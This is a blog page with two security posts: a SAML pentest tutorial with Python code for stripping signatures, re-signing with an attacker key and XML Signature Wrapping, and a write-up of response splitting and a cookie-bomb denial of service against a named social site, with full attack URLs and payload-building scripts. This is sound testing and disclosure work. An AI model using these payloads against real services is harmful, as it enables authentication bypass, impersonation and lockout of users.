

Wednesday, 14 December 2016

XML Signature (Basic to Advanced)

The XML Signature Standard

The XML Signature standard is an immensely complicated beast, designed by a working group involving all the big names, and intended to be a one-size-fits-all solution to building tamper-resistant XML documents. Unfortunately, as is often the case, one-size-fits-all becomes the-only-size-fits-nobody.
In a normal application of digital signatures, we take a document to be signed, run it through a cryptographic hash function, and then apply a digital signature algorithm to the hash. If the document received is exactly identical, the signature will validate, whereas if even a single bit changes, the signature becomes invalid and the document is rejected.
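To make the contrast concrete, here is a minimal sketch of that ordinary hash-then-sign flow in Python, using the cryptography library (the key and document here are stand-ins, not anything SAML-specific):

from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa

# Sign the exact bytes of the document: the library hashes them (SHA-256)
# and signs the hash.
key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
document = b"<Response>...</Response>"
signature = key.sign(document, padding.PKCS1v15(), hashes.SHA256())

# Verification over the unmodified bytes succeeds...
key.public_key().verify(signature, document, padding.PKCS1v15(), hashes.SHA256())

# ...but changing even one byte raises InvalidSignature.
try:
    key.public_key().verify(signature, document + b" ", padding.PKCS1v15(), hashes.SHA256())
except InvalidSignature:
    print("tampered document rejected")

There is no notion here of signing "part of" the document, or of the signature living inside the thing it protects; that is exactly what XML Signature adds, and where the trouble starts.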
Unfortunately, XML Signatures have one killer feature - the standard allows us to sign part of the document instead of the whole document, and to embed the signature within the same document it’s supposed to be validating - so-called inline signatures. The signatures do this by containing a “Reference” to the part of the document they sign, usually by referring to the “ID” attribute of an XML element, but in theory allowing anything in the XPath standard to be used as an expression. I can, in theory, write a signature anywhere within a document that refers to the “third to last <foo> element”, or equally vague expressions.
When validating an XML signature it’s not enough to ask the question “is this a valid signature from this signer?”. We also have to ask “is this signature present, referring to the right part of the document, applying all the right canonicalizations, from the expected signer AND valid?”. All too often, at least one of these checks is not implemented.

Getting Started with SAML Raider

While all the attacks described here can be carried out without many tools, SAML Raider, a Burp proxy plugin, is a useful tool for testing the common cases.

Checks

As described above, signatures can appear in various places within the SAML message and cover various parts of the message. By keeping the content of the message but adding new parts and modifying the structure of the remaining parts, we can craft messages that are still technically signed correctly, but may be interpreted by SAML libraries as having crucial parts signed when they are not.
Whenever the Service Provider is supposed to check something, there’s an opportunity for it to fail to do so, or to do so incorrectly, giving us a chance to bypass the signature. Enable Burp’s interception, capture the SAML message, and try these transformations. Each one should be done against a fresh, valid log-in attempt, as there is usually a nonce preventing us from replaying the same request repeatedly.
For repeated attempts, you may benefit from configuring Burp’s interception options so that only the relevant endpoint is intercepted.

Is a Signature Required?

The SAML standard requires that all messages passed through insecure channels, such as the user’s browser, be signed. However, messages that pass through secure channels, such as an SSL/TLS back channel, do not have to be. As a result, we’ve seen SAML consumers that validate any signature present, but silently skip validation if the signature is removed. The software is essentially presuming that someone else has already checked that a message coming from an insecure channel is signed, when this isn’t the case.
The impact of this is the ability to simply remove the signatures and tamper with the response as if they weren’t there. SAML Raider can test this one pretty easily.
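If you want to reproduce the test without the plugin, a rough sketch (assuming the HTTP-POST binding, where the SAMLResponse parameter is plain Base64) looks like this; feed the output back into the intercepted request:

import base64
from lxml import etree

DS_SIGNATURE = "{http://www.w3.org/2000/09/xmldsig#}Signature"

def strip_signatures(saml_response_b64):
    # Decode the SAMLResponse, drop every ds:Signature element, re-encode.
    root = etree.fromstring(base64.b64decode(saml_response_b64))
    for sig in root.findall(".//" + DS_SIGNATURE):
        sig.getparent().remove(sig)
    return base64.b64encode(etree.tostring(root)).decode()

If the Service Provider still accepts the result, signature validation is effectively optional.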

Is the Signature Validated?

Validating XML signatures is extremely complicated, as the standard expects a series of transformation and canonicalization steps to be applied first (e.g. to ignore the amount of white space). The difficulty of this makes it extremely hard to validate signatures without a fully featured XML Signature library behind you. The impacts of this are:
  • Developers don’t generally understand the internals of signature validation.
  • Intermediate tools, such as web application firewalls, have no idea whether signatures are valid or not.
  • Libraries may have configurable options, such as lists of permitted canonicalization methods, which are meaningless to the developer.
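As a small illustration of why this is hard, here is what canonicalization does to two superficially different serializations of the same (made-up) element, sketched with lxml:

from lxml import etree

# Attribute order, extra whitespace and the empty-element form all differ...
a = etree.fromstring('<a   c="2"  b="1"/>')
b = etree.fromstring('<a b="1" c="2"></a>')

# ...but Canonical XML reduces both to identical bytes.
print(etree.tostring(a, method="c14n"))  # b'<a b="1" c="2"></a>'
print(etree.tostring(b, method="c14n"))  # b'<a b="1" c="2"></a>'

A validator has to apply exactly the canonicalizations and transforms named in the signature before hashing, which is why hand-rolled checks and middleboxes so often get it wrong.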
The difficulty of implementing this standard, and the somewhat arcane nature of it, leads to the issues we will now look at.
First, testing whether the signature is validated at all is simple - change something in the supposedly signed content and see if it breaks.

Is the Signature From The Right Signer?

Another stumbling block is whether or not the receiver checks the identity of the signer. We haven’t seen this one done wrong, but SAML Raider will make this fairly easy to test.
Copy the certificate to SAML Raider’s certificate store:
Save and self-sign the certificate, so we have a self-signed copy of the same certificate:
Now we can re-sign the original request with our new certificate, either by signing the whole message or the assertion:
You could identify which of those two options is normally used by your recipient, or just try each of them.
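If you would rather do the re-signing outside Burp, a rough sketch with the Python signxml library is below. It assumes you have already generated an attacker key pair (for example with openssl) as attacker.key and attacker.crt - the file names are placeholders - and it re-signs the whole decoded Response; signing just the Assertion works the same way:

import base64
from lxml import etree
from signxml import XMLSigner

saml_response_b64 = "..."  # the intercepted SAMLResponse parameter

with open("attacker.key") as f:
    key_pem = f.read()
with open("attacker.crt") as f:
    cert_pem = f.read()

root = etree.fromstring(base64.b64decode(saml_response_b64))

# Drop the IdP's signature, then add our own enveloped signature.
for sig in root.findall(".//{http://www.w3.org/2000/09/xmldsig#}Signature"):
    sig.getparent().remove(sig)
signed = XMLSigner().sign(root, key=key_pem, cert=cert_pem)

tampered = base64.b64encode(etree.tostring(signed)).decode()

SAML Raider takes care of pointing the new signature’s Reference at the right ID for you; if you script it yourself, signxml’s reference_uri argument does the same job. If the Service Provider accepts the result, it is not checking that the signing certificate belongs to the expected Identity Provider.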

Is the Correct Part of the Response Signed?

How XSW Attacks Work

The SAML standard allows signatures to appear in two places only:
  • A signature within a <Response> tag, signing the Response tag and its descendants.
  • A signature within an <Assertion> tag, signing the Assertion tag and its descendants.
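For illustration, here is roughly what the second case looks like, with the Reference URI pointing at the Assertion’s ID attribute (everything here - the IDs, the subject, the missing digest and key details - is made up and heavily trimmed):

from lxml import etree

saml = b"""
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
                xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
                xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
  <saml:Assertion ID="_abc123">
    <ds:Signature>
      <ds:SignedInfo>
        <ds:Reference URI="#_abc123"/>
      </ds:SignedInfo>
    </ds:Signature>
    <saml:Subject><saml:NameID>alice</saml:NameID></saml:Subject>
  </saml:Assertion>
</samlp:Response>
"""

ref = etree.fromstring(saml).find(".//{http://www.w3.org/2000/09/xmldsig#}Reference")
print(ref.get("URI"))  # "#_abc123": the signature only claims to cover that ID

Note that the only link between the signature and the signed content is that ID string, which is exactly the indirection XSW attacks exploit.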
The SAML standard is very specific about where signatures are allowed to be, and what they are allowed to refer to.
However, nobody implements XML signatures in all their gory complexity for use in SAML alone. The standard is generic, and so are the implementations and software libraries built for it. As a result, the separation of responsibilities looks like this:
  • The XML Signature library validates according to the XML Signature standard, which allows anything to be signed from anywhere.
  • The SAML library expects the XML Signature library to tell it whether or not the response is valid.
Somewhere in the middle of these two components, the rules about what we have to sign are often lost. As a result, we can often have our signature refer to a different part of the document, and still appear valid to the recipient.
By copying the signed parts of the document, and ensuring the signatures point to the copies, we can separate the part of the document that the XML Signature library checks from the part of the document that the SAML library consumes.

Automated XSW

SAML Raider will automate the most common attacks of this form for you:
Try selecting each of those options from the drop-down, clicking “Apply XSW” and sending the request on. If this doesn’t cause an error, try doing it again and changing the username or other user identifier in each place it appears in the SAML XML.

Limitations of SAML Raider

While SAML Raider will test the common cases, there are a few attacks that require a deeper understanding:
  • Producing a response that will validate against an XML schema (requires hiding the shadow copy inside an element that may contain xs:any).
  • Bypassing validation when both the Response and the Assertions within it are signed and checked.
  • Bypassing XML signatures in non-SAML contexts, for example SOAP endpoints using WS-Security extensions.

Manual XSW

If SAML Raider’s out-of-the-box options don’t work, you may want to try a manual approach:
  • Decode the Base64-encoded content to access the SAML Response XML.
  • Check that the signature’s <Reference> tag contains the ID of a signed element.
  • Copy the signed content somewhere else in the document (often the end of the <Response> is fine; if XML Schema validation is in play, find somewhere to copy it that doesn’t break the schema).
  • Remove the XML signature from the copy, leaving it in the original. This is necessary because the enveloped-signature transform excludes the signature itself from the content being digested; in the original document this was the contained signature, so the copy must not contain it if it is to produce the same digest.
  • Change the ID of the original signed element to something different (e.g. change a letter).
  • Change the content of the original assertion.
  • Re-encode as Base64, put it into the request, and forward it on.
If the signature validation points to the copy, it will ignore your changes. With practice, you can complete this process pretty quickly if strict time limits on requests are in play.
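A rough sketch of those steps in Python with lxml is below (the HTTP-POST binding is assumed, so the SAMLResponse is plain Base64; the element names are standard SAML, but where the clone can safely live depends on the target and any schema validation):

import base64, copy
from lxml import etree

DS = "{http://www.w3.org/2000/09/xmldsig#}"
SAML = "{urn:oasis:names:tc:SAML:2.0:assertion}"

def xsw(saml_response_b64, new_subject):
    root = etree.fromstring(base64.b64decode(saml_response_b64))
    assertion = root.find(".//" + SAML + "Assertion")

    # Copy the signed assertion and strip the signature from the copy only,
    # so the copy digests to the same value the enveloped transform produced.
    clone = copy.deepcopy(assertion)
    for sig in clone.findall(".//" + DS + "Signature"):
        sig.getparent().remove(sig)
    root.append(clone)  # the copy keeps the original ID, so the Reference resolves to it

    # Break the original's ID and tamper with its content; the SAML layer
    # will still consume this original, signature and all.
    assertion.set("ID", assertion.get("ID") + "x")
    assertion.find(".//" + SAML + "NameID").text = new_subject

    return base64.b64encode(etree.tostring(root)).decode()

This is only a skeleton; in practice you will also have to fight schema validation and work out which of the two assertions the SAML library actually consumes.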

SAML Pentest Checklist

  • Does the SAML response pass through the web browser?
  • Is it signed? If not, try changing the content.
  • Is it accepted if we remove the signatures?
  • Is it accepted if we re-sign it with a different certificate?
  • Do any of the eight transforms baked in to SAML Raider produce a result that is accepted?
  • If you change such a response, is the modified response accepted?
  • Might one of SAML Raider’s limitations noted above apply? If so, you may need to fall back to the manual approach described above.

Please do comment below if you have any questions.

Sunday, 11 December 2016

HTTP response splitting (advanced part)

HTTP Response Splitting with Header Overflow

This issue clearly demonstrates how HTTP Response Splitting differs from CRLF injection. Normally, 99% of HTTP Response Splitting vulnerabilities are caused by CRLF injection, while this one abused a different flaw that did not involve injecting CR or LF at all.
It happened right after the last episode. Their monkey-patch approach finally paid off - inputs on the same page still lacked proper validation, which led to the discovery of this issue. Crafting a long enough value in one of the input parameters caused the HTML source to be shown directly.
[Image: what happened after crafting a long enough input]
This unusual scene was due to the missing Content-Type. In fact, half of the header fields that were supposed to be sent along with the response had been cut off. The server seemed to handle only the first 8kB of the response header; beyond that, it sensed the response was probably incomplete or broken and returned an HTTP 500 (Internal Server Error). The interesting thing is that the truncated part got returned when the same request was reissued (let's call that the second response). As we can control what value is reflected in the response header, we can inject a string whose length, plus that of the preceding header fields, slightly exceeds 8kB - and suddenly the last couple of characters of our injected string become the beginning of the next response header.
[Image: the weird response splitting behavior]
In this case, after injecting something like AAA[...]AAA:foobar into reported_user_id, AAA:foobar becomes a header field with name AAA and value foobar in the second response. Apparently we can replace it with a standardized header field (e.g. Access-Control-Allow-Origin) to do real harm.
However, it was not easy to decide how much padding to add to fill up exactly 8kB, because the response headers can vary from request to request. We need a deterministic way to have the header truncated exactly where we want. Quick fuzzing revealed that the server swallows spaces (U+0020) in the header field name. In other words, we can use spaces as padding. So to sum up:
  1. Prepend loads of spaces (slightly less than 8kB worth, otherwise the server rejects the request with HTTP 414 (Request-URI Too Long)) to the header field chosen for the attack
  2. Put the crafted value into one of the input parameters
  3. Make victims visit the page twice, because only the second time actually triggers the payload
One final challenge was that browsers encode a space as %20. The problem is that this costs 3 bytes instead of 1, which bloats our intended payload (remember the request URI needs to stay under 8kB, as stated above). Luckily, the plus sign (+) is also accepted as an encoded space.
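Putting the steps together, a sketch of how the padded URL gets built (the overhead and buffer numbers here are assumptions that have to be tuned against the real response):

# '+' decodes to a space, which the server swallows in header-field names,
# so it serves as 1-byte padding inside the request URI.
BUFFER_SIZE = 8 * 1024          # observed response-header limit
HEADER_OVERHEAD = 1024          # assumed size of the header fields that precede ours
PAYLOAD = "set-cookie:foobar"   # what should start the second response's headers

padding = "+" * (BUFFER_SIZE - HEADER_OVERHEAD)
url = ("https://twitter.com/i/safety/report_story"
       "?next_view=report_story_start&source=reporttweet"
       "&reported_user_id=1&reporter_user_id=1&is_media=true&is_promoted=true"
       "&reported_tweet_id=" + padding + PAYLOAD)

The victim then has to load the resulting URL twice, as described above.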
To be honest I have no idea what the root cause of this was. It might be a buffer implementation bug, but I can't tell for sure. Anyway, this weird behavior was fixed, but there's still no validation on the inputs whatsoever.

Final attack payload

https://twitter.com/i/safety/report_story?next_view=report_story_start&source=reporttweet&reported_user_id=1&reporter_user_id=1&is_media=true&is_promoted=true&reported_tweet_id=+++[...]+++set-cookie:foobar
And the full response header:
HTTP/1.1 200 OK  
set-cookie: foobar  
x-response-time: 229  
x-connection-hash: 4f7c08fce85fe4801b3b24f05764fc84  
x-content-type-options: nosniff  
x-frame-options: SAMEORIGIN  
x-transaction: f9709a489ba395b5  
x-twitter-response-tags: BouncerCompliant  
x-xss-protection: 1; mode=block  

Denial of Service with Cookie Bomb

The above discovery was actually a byproduct of this one. Since the inputs are reflected in Set-Cookie, we can control the value of these particular cookies as well as their attributes (e.g. Domain, Expires). Previously this would have meant a CSRF protection bypass (using a comma (,) as the cookie separator, fwiw), but that's no longer the case, as Twitter now compares the token to the one in the session. Still, attackers can exploit it with a Cookie Bomb.
Cookie Bomb is a term introduced by Egor Homakov. The attack itself is nothing new, but few people actually look into it. The main idea is that servers reject requests with an exceptionally large header. The exact figure varies between servers, but generally the request header can't be greater than 8kB. By abusing this, attackers can force victims into accepting a bunch of large cookies. Every subsequent request from the victim to the corresponding website will then carry those very large cookies, causing the server to reject all of the victim's requests (a.k.a. Denial of Service).
The attack can be further improved by manipulating different cookie attributes:
  • Domain: instead of just example.com, setting it to .example.com makes the cookies apply to all sub-domains, paralyzing the entire service
  • Expires: by default a cookie is destroyed when the browser restarts unless otherwise specified; attackers can turn this around and set a far-future expiry to lock victims out until they manually delete the cookies
  • Path: setting it to the root path (/) maximizes the number of affected pages

Attack in Action

Attack payload (without encoding, for readability):
https://twitter.com/i/safety/report_story?next_view=report_story_start&reported_user_id=000[...]000;Expires=Wed, 02 Apr 2025 12:21:55 GMT;Path=/;Domain=.twitter.com&reporter_user_id=1&is_media=true&is_promoted=true&reported_tweet_id=000[...]000;Expires=Wed, 02 Apr 2025 12:21:55 GMT;Path=/;Domain=.twitter.com
Response header:
HTTP/1.1 200 OK  
[...]
set-cookie: reported_user_id=000[...]000;Expires=Wed, 02 Apr 2025 12:21:55 GMT;Path=/;Domain=.twitter.com  
set-cookie: reported_tweet_id=000[...]000;Expires=Wed, 02 Apr 2025 12:21:55 GMT;Path=/;Domain=.twitter.com  
[...]
You may wonder why we use two cookies rather than just one. That's because a single cookie can contain at most about 4kB of data.
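A sketch of generating such a URL follows; the 3,500 figure is an assumption chosen to keep each Set-Cookie, attributes included, under the roughly 4kB per-cookie limit:

from urllib.parse import quote

ATTRS = ";Expires=Wed, 02 Apr 2025 12:21:55 GMT;Path=/;Domain=.twitter.com"
bomb = "0" * 3500  # each reflected value stays under ~4kB including its attributes

base = "https://twitter.com/i/safety/report_story?next_view=report_story_start"
url = (base
       + "&reported_user_id=" + bomb + quote(ATTRS)
       + "&reporter_user_id=1&is_media=true&is_promoted=true"
       + "&reported_tweet_id=" + bomb + quote(ATTRS))

Two cookies of roughly 4kB each comfortably push every later request header past the 8kB limit.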
[Image: the attack in action]
After victims visit the page, our bomb is silently planted. No more tweeting for them.